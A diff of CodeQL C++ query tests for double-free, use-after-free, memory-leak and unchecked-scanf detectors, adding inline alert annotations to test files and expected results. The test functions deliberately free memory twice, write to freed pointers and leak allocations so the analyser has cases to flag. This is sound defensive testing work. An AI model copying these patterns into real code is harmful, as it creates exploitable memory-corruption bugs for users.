| * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | -| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | -| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | -| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref index 8e68f14ce223..eab98ddcb530 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.qlref @@ -1 +1,2 @@ -Critical/DoubleFree.ql +query: Critical/DoubleFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref index 33da8e296e22..84fd18014db0 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryMayNotBeFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryMayNotBeFreed.ql \ No newline at end of file +query: Critical/MemoryMayNotBeFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref index 2d1336a55ebf..108a872987d7 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/MemoryNeverFreed.qlref @@ -1 +1,2 @@ -Critical/MemoryNeverFreed.ql \ No newline at end of file +query: Critical/MemoryNeverFreed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected index 891141f56f1e..153350b2a99c 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.expected @@ -1,3 +1,28 @@ +#select +| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | +| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | +| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | +| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. | test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | +| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | +| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | +| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | +| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:245:5:245:8 | call to free | call to free | +| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | +| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | +| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | +| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | +| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | +| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:331:5:331:12 | delete | delete | edges | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | provenance | | | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | provenance | | @@ -93,28 +118,3 @@ nodes | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:332:5:332:6 | * ... | semmle.label | * ... | subpaths -#select -| test.cpp:214:2:214:2 | a | test.cpp:213:7:213:7 | pointer to free output argument | test.cpp:214:2:214:2 | a | Memory may have been previously freed by $@. | test.cpp:213:2:213:5 | call to free | call to free | -| test.cpp:220:2:220:2 | a | test.cpp:219:7:219:7 | pointer to free output argument | test.cpp:220:2:220:2 | a | Memory may have been previously freed by $@. | test.cpp:219:2:219:5 | call to free | call to free | -| test.cpp:229:4:229:8 | data1 | test.cpp:228:14:228:18 | pointer to operator delete[] output argument | test.cpp:229:4:229:8 | data1 | Memory may have been previously freed by $@. | test.cpp:228:2:228:18 | delete[] | delete[] | -| test_free.cpp:12:5:12:5 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:12:5:12:5 | a | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:13:5:13:6 | * ... | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:13:5:13:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:45:5:45:5 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:45:5:45:5 | a | Memory may have been previously freed by $@. | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:71:9:71:9 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:71:9:71:9 | a | Memory may have been previously freed by $@. | test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:84:5:84:5 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:84:5:84:5 | a | Memory may have been previously freed by $@. | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:91:5:91:5 | a | test_free.cpp:90:10:90:10 | pointer to free output argument | test_free.cpp:91:5:91:5 | a | Memory may have been previously freed by $@. | test_free.cpp:90:5:90:8 | call to free | call to free | -| test_free.cpp:96:9:96:9 | a | test_free.cpp:95:10:95:10 | pointer to free output argument | test_free.cpp:96:9:96:9 | a | Memory may have been previously freed by $@. | test_free.cpp:95:5:95:8 | call to free | call to free | -| test_free.cpp:102:23:102:23 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:102:23:102:23 | a | Memory may have been previously freed by $@. | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:153:5:153:5 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:153:5:153:5 | a | Memory may have been previously freed by $@. | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:236:9:236:10 | * ... | test_free.cpp:233:14:233:15 | pointer to free output argument | test_free.cpp:236:9:236:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:233:9:233:12 | call to free | call to free | -| test_free.cpp:241:9:241:10 | * ... | test_free.cpp:239:14:239:15 | pointer to free output argument | test_free.cpp:241:9:241:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:239:9:239:12 | call to free | call to free | -| test_free.cpp:246:9:246:10 | * ... | test_free.cpp:245:10:245:11 | pointer to free output argument | test_free.cpp:246:9:246:10 | * ... | Memory may have been previously freed by $@. | test_free.cpp:245:5:245:8 | call to free | call to free | -| test_free.cpp:278:15:278:17 | buf | test_free.cpp:277:8:277:13 | pointer to free output argument | test_free.cpp:278:15:278:17 | buf | Memory may have been previously freed by $@. | test_free.cpp:277:3:277:6 | call to free | call to free | -| test_free.cpp:283:14:283:16 | buf | test_free.cpp:282:8:282:12 | pointer to free output argument | test_free.cpp:283:14:283:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:282:3:282:6 | call to free | call to free | -| test_free.cpp:295:14:295:16 | buf | test_free.cpp:293:8:293:10 | pointer to free output argument | test_free.cpp:295:14:295:16 | buf | Memory may have been previously freed by $@. | test_free.cpp:293:3:293:6 | call to free | call to free | -| test_free.cpp:321:5:321:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:321:5:321:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:313:16:313:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:313:9:313:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:319:9:319:16 | delete | delete | -| test_free.cpp:324:5:324:6 | * ... | test_free.cpp:322:12:322:12 | pointer to operator delete output argument | test_free.cpp:324:5:324:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:322:5:322:12 | delete | delete | -| test_free.cpp:332:5:332:6 | * ... | test_free.cpp:331:12:331:12 | pointer to operator delete output argument | test_free.cpp:332:5:332:6 | * ... | Memory may have been previously freed by $@. | test_free.cpp:331:5:331:12 | delete | delete | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref index e299a3055e04..096090964894 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/UseAfterFree.qlref @@ -1 +1,2 @@ -Critical/UseAfterFree.ql \ No newline at end of file +query: Critical/UseAfterFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp b/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp index e7c00bdf0048..dbd6e90bed45 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/my_auto_ptr.cpp @@ -52,9 +52,9 @@ template class AutoContainer2 { public: - AutoContainer2() : v(new T) // GOOD [FALSE POSITIVE] + AutoContainer2() : v(new T) // GOOD [FALSE POSITIVE] // $ Alert[cpp/memory-never-freed] { - ns::my_auto_ptr ap(new T); // GOOD [FALSE POSITIVE] + ns::my_auto_ptr ap(new T); // GOOD [FALSE POSITIVE] // $ Alert[cpp/memory-never-freed] } ns::my_auto_ptr v; @@ -68,7 +68,7 @@ class AutoCloner AutoCloner(AutoCloner &from) : val(from.val) {}; ns::my_auto_ptr clone() { - return ns::my_auto_ptr(new AutoCloner(*this)); // GOOD [FALSE POSITIVE] + return ns::my_auto_ptr(new AutoCloner(*this)); // GOOD [FALSE POSITIVE] // $ Alert[cpp/memory-never-freed] } private: @@ -77,9 +77,9 @@ class AutoCloner int main() { - int *i1 = new int; // BAD: never deleted - int *i2 = id(new int); // BAD: never deleted - ignore(new int); // BAD: never deleted + int *i1 = new int; // BAD: never deleted // $ Alert[cpp/memory-never-freed] + int *i2 = id(new int); // BAD: never deleted // $ Alert[cpp/memory-never-freed] + ignore(new int); // BAD: never deleted // $ Alert[cpp/memory-never-freed] ns::my_auto_ptr a1(new char); // GOOD ns::my_auto_ptr a2(new short); // GOOD diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp b/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp index 7f3afc95550c..7f2fd2b6101a 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/test.cpp @@ -23,7 +23,7 @@ myClass1 :: myClass1() array1 = (int *)malloc(sizeof(int) * 100); array2 = (int *)malloc(sizeof(int) * 100); array3 = (int *)malloc(sizeof(int) * 100); - array4 = (int *)malloc(sizeof(int) * 100); // never freed + array4 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array1); } @@ -39,7 +39,7 @@ void myClass1 :: method1() array5 = (int *)malloc(sizeof(int) * 100); array6 = (int *)malloc(sizeof(int) * 100); array7 = (int *)malloc(sizeof(int) * 100); - array8 = (int *)malloc(sizeof(int) * 100); // never freed + array8 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array3); free(array5); @@ -70,7 +70,7 @@ myClass2 :: myClass2() array1 = (int *)malloc(sizeof(int) * 100); array2 = (int *)malloc(sizeof(int) * 100); array3 = (int *)malloc(sizeof(int) * 100); - array4 = (int *)malloc(sizeof(int) * 100); // never freed + array4 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array1); } @@ -86,7 +86,7 @@ void myClass2 :: method1() array5 = (int *)malloc(sizeof(int) * 100); array6 = (int *)malloc(sizeof(int) * 100); array7 = (int *)malloc(sizeof(int) * 100); - array8 = (int *)malloc(sizeof(int) * 100); // never freed + array8 = (int *)malloc(sizeof(int) * 100); // never freed // $ Alert[cpp/memory-never-freed] free(array3); free(array5); @@ -153,8 +153,8 @@ int overloadedNew() { new(buf) int[1]; // GOOD *(int*)buf = 4; - new(std::nothrow) int(3); // BAD - new(std::nothrow) int[2]; // BAD + new(std::nothrow) int(3); // BAD // $ Alert[cpp/memory-never-freed] + new(std::nothrow) int[2]; // BAD // $ Alert[cpp/memory-never-freed] return 0; } @@ -166,7 +166,7 @@ void output_msg(const char *msg); void test_strdup() { char msg[] = "OctoCat"; - char *cpy = strdup(msg); // BAD + char *cpy = strdup(msg); // BAD // $ Alert[cpp/memory-never-freed] output_msg(cpy); } @@ -210,14 +210,14 @@ void test_reassignment() { char *a = (char *)malloc(128); char *b = (char *)malloc(128); - free(a); - a[0] = 0; // BAD + free(a); // $ Source[cpp/use-after-free] + a[0] = 0; // BAD // $ Alert[cpp/use-after-free] a = b; a[0] = 0; // GOOD - free(a); - a[0] = 0; // BAD + free(a); // $ Source[cpp/use-after-free] + a[0] = 0; // BAD // $ Alert[cpp/use-after-free] DataPair p; p.data1 = new char[128]; @@ -225,8 +225,8 @@ void test_reassignment() { p.data1[0] = 0; // GOOD p.data2[0] = 0; // GOOD - delete [] p.data1; - p.data1[0] = 0; // BAD + delete [] p.data1; // $ Source[cpp/use-after-free] + p.data1[0] = 0; // BAD // $ Alert[cpp/use-after-free] p.data2[0] = 0; // GOOD p.data1 = new char[128]; diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp b/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp index 0a6532015a76..afc0b428f060 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/test_free.cpp @@ -8,10 +8,10 @@ int asprintf(char ** strp, const char * fmt, ...); void* test_double_free1(int *a) { - free(a); // GOOD - a[5] = 5; // BAD - *a = 5; // BAD - free(a); // BAD + free(a); // GOOD // $ Source[cpp/double-free] Source[cpp/use-after-free] + a[5] = 5; // BAD // $ Alert[cpp/use-after-free] + *a = 5; // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] a = (int*) malloc(8); free(a); // GOOD a = (int*) malloc(8); @@ -27,28 +27,28 @@ void test_double_free_aliasing(void *a, void* b) { } void test_dominance1(void *a) { - free(a); - if (condition()) free(a); // BAD + free(a); // $ Source[cpp/double-free] + if (condition()) free(a); // BAD // $ Alert[cpp/double-free] } void test_dominance2(void *a) { - free(a); - if (condition()) a = malloc(10); - if (condition()) free(a); // BAD + free(a); // $ Source[cpp/double-free] + if (condition()) a = malloc(10); // $ Alert[cpp/memory-may-not-be-freed] + if (condition()) free(a); // BAD // $ Alert[cpp/double-free] } void test_post_dominance1(int *a) { - if (condition()) free(a); + if (condition()) free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] if (condition()) a[2] = 5; // BAD [NOT DETECTED] - if (condition()) free(a); // BAD [NOT DETECTED] - a[2] = 5; // BAD - free(a); // BAD + if (condition()) free(a); // BAD [NOT DETECTED] // $ Source[cpp/double-free] Source[cpp/use-after-free] + a[2] = 5; // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] } void test_post_dominance2(void *a) { - if (condition()) free(a); - free(a); // BAD + if (condition()) free(a); // $ Source[cpp/double-free] + free(a); // BAD // $ Alert[cpp/double-free] } void test_post_dominance3(void *a) { @@ -66,10 +66,10 @@ void test_use_after_free6(int *a, int *b) { void test_use_after_free7(int *a) { a[0] = 42; - free(a); + free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] - if (a[3]) { // BAD - free(a); // BAD + if (a[3]) { // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] } } @@ -80,27 +80,27 @@ class A { void test_new1() { A *a = new A(); - delete(a); - a->f(); // BAD - delete(a); // BAD + delete(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] + a->f(); // BAD // $ Alert[cpp/use-after-free] + delete(a); // BAD // $ Alert[cpp/double-free] } void test_dereference1(A *a) { a->f(); // GOOD - free(a); - a->f(); // BAD + free(a); // $ Source[cpp/use-after-free] + a->f(); // BAD // $ Alert[cpp/use-after-free] } void* use_after_free(void *a) { - free(a); - use(a); // BAD + free(a); // $ Source[cpp/use-after-free] + use(a); // BAD // $ Alert[cpp/use-after-free] return a; // BAD } void test_realloc1(void *a) { - free(a); - void *b = realloc(a, sizeof(a)*3); // BAD [NOT DETECTED by cpp/double-free] - free(a); // BAD + free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] + void *b = realloc(a, sizeof(a)*3); // BAD [NOT DETECTED by cpp/double-free] // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] free(b); // GOOD } void* test_realloc2(char *a) { @@ -125,8 +125,8 @@ void test_realloc3(void *a) { void test_ptr_deref(void ** a) { free(*a); *a = malloc(10); - free(*a); // GOOD - free(*a); // BAD + free(*a); // GOOD // $ Source[cpp/double-free] + free(*a); // BAD // $ Alert[cpp/double-free] *a = malloc(10); free(a[0]); // GOOD free(a[1]); // GOOD @@ -149,9 +149,9 @@ void test_loop1(struct list ** list_ptr) { } void test_use_after_free8(struct list * a) { - if (condition()) free(a); - a->data = malloc(10); // BAD - free(a); // BAD + if (condition()) free(a); // $ Source[cpp/double-free] Source[cpp/use-after-free] + a->data = malloc(10); // BAD // $ Alert[cpp/use-after-free] + free(a); // BAD // $ Alert[cpp/double-free] } void test_loop2(char ** a) { @@ -164,7 +164,7 @@ void test_loop2(char ** a) { void* test_realloc4() { void *a = 0; - void *b = realloc(a, 10); // BAD for cpp/memory-never-freed + void *b = realloc(a, 10); // BAD for cpp/memory-never-freed // $ Alert[cpp/memory-never-freed] if (!b) { return a; } return b; } @@ -204,9 +204,9 @@ char* test_return2(char *a) { void test_condition1(char *a) { free(a); if (asprintf(&a, "Hello world") || condition()); - free(a); //GOOD + free(a); //GOOD // $ Source[cpp/double-free] if (condition() || asprintf(&a, "Hello world")); - free(a); // BAD + free(a); // BAD // $ Alert[cpp/double-free] } void test_condition2(char *a) { @@ -230,27 +230,27 @@ void test_ms_free(void * memory_descriptor_list) { void test_loop3(char ** a, char ** b) { if (*a) { - free(*a); + free(*a); // $ Source[cpp/use-after-free] a++; } - use(*a); // GOOD [FALSE POSITIVE] + use(*a); // GOOD [FALSE POSITIVE] // $ Alert[cpp/use-after-free] for (;*b; b++) { - free(*b); + free(*b); // $ Source[cpp/use-after-free] } - use(*b); // GOOD [FALSE POSITIVE] + use(*b); // GOOD [FALSE POSITIVE] // $ Alert[cpp/use-after-free] } void test_deref(char **a) { - free(*a); - use(*a); // GOOD [FALSE POSITIVE] + free(*a); // $ Source[cpp/use-after-free] + use(*a); // GOOD [FALSE POSITIVE] // $ Alert[cpp/use-after-free] } // Refs void test_ref(char *&p) { free(p); - p = (char *)malloc(sizeof(char)*10); + p = (char *)malloc(sizeof(char)*10); // $ Alert[cpp/memory-never-freed] use(p); // GOOD free(p); // GOOD } @@ -258,13 +258,13 @@ void test_ref(char *&p) { void test_ref_delete(int *&p) { delete p; - p = new int; + p = new int; // $ Alert[cpp/memory-never-freed] use(p); // GOOD delete p; // GOOD } void test_free_assign() { - void *a = malloc(10); + void *a = malloc(10); // $ Alert[cpp/memory-may-not-be-freed] void *b; free(b = a); // GOOD } @@ -274,13 +274,13 @@ struct MyStruct { }; void test_free_struct(MyStruct* s) { - free(s->buf); - char c = s->buf[0]; // BAD + free(s->buf); // $ Source[cpp/use-after-free] + char c = s->buf[0]; // BAD // $ Alert[cpp/use-after-free] } void test_free_struct2(MyStruct s) { - free(s.buf); - char c = s.buf[0]; // BAD + free(s.buf); // $ Source[cpp/use-after-free] + char c = s.buf[0]; // BAD // $ Alert[cpp/use-after-free] } void test_free_struct3(MyStruct s) { @@ -290,16 +290,16 @@ void test_free_struct3(MyStruct s) { } void test_free_struct4(char* buf, MyStruct s) { - free(buf); + free(buf); // $ Source[cpp/use-after-free] s.buf = buf; - char c = s.buf[0]; // BAD + char c = s.buf[0]; // BAD // $ Alert[cpp/use-after-free] } void g_free (void*); void test_g_free(char* buf) { - g_free(buf); - g_free(buf); // BAD + g_free(buf); // $ Source[cpp/double-free] + g_free(buf); // BAD // $ Alert[cpp/double-free] } // inspired by real world FPs @@ -310,26 +310,26 @@ void test_goto() { *a = 1; // GOOD if (condition()) { - delete a; + delete a; // $ Source[cpp/use-after-free] goto after; } *a = 1; // GOOD if (condition()) { - delete a; + delete a; // $ Source[cpp/double-free] Source[cpp/use-after-free] } - *a = 1; // BAD (use after free) - delete a; // BAD (double free) + *a = 1; // BAD (use after free) // $ Alert[cpp/use-after-free] + delete a; // BAD (double free) // $ Alert[cpp/double-free] Source[cpp/use-after-free] after: - *a = 1; // BAD (use after free) + *a = 1; // BAD (use after free) // $ Alert[cpp/use-after-free] } void test_reassign() { int *a = (int *)malloc(sizeof(int)); *a = 1; // GOOD - delete a; - *a = 1; // BAD (use after free) + delete a; // $ Source[cpp/use-after-free] + *a = 1; // BAD (use after free) // $ Alert[cpp/use-after-free] a = (int *)malloc(sizeof(int)); *a = 1; // GOOD delete a; @@ -362,10 +362,10 @@ void test(E* e) { void test_return_by_parameter(int **out_i, MyStruct **out_ms) { int *a = (int *)malloc(sizeof(int)); // GOOD (freed) int *b = (int *)malloc(sizeof(int)); // GOOD (out parameter) - int *d = (int *)malloc(sizeof(int)); // BAD (not freed) + int *d = (int *)malloc(sizeof(int)); // BAD (not freed) // $ Alert[cpp/memory-never-freed] MyStruct *e = (MyStruct *)malloc(sizeof(MyStruct)); // GOOD (freed) MyStruct *f = (MyStruct *)malloc(sizeof(MyStruct)); // GOOD (out parameter) - MyStruct *h = (MyStruct *)malloc(sizeof(MyStruct)); // BAD (not freed) + MyStruct *h = (MyStruct *)malloc(sizeof(MyStruct)); // BAD (not freed) // $ Alert[cpp/memory-never-freed] free(a); *out_i = b; diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref index b166b6b60b9c..39a4f630f4ca 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/IncorrectCheckScanf.qlref @@ -1 +1,2 @@ -Critical/IncorrectCheckScanf.ql \ No newline at end of file +query: Critical/IncorrectCheckScanf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected index 9b7564b9123d..e9c1038e5a4f 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.expected @@ -1,3 +1,25 @@ +#select +| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | +| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | +| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | +| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call 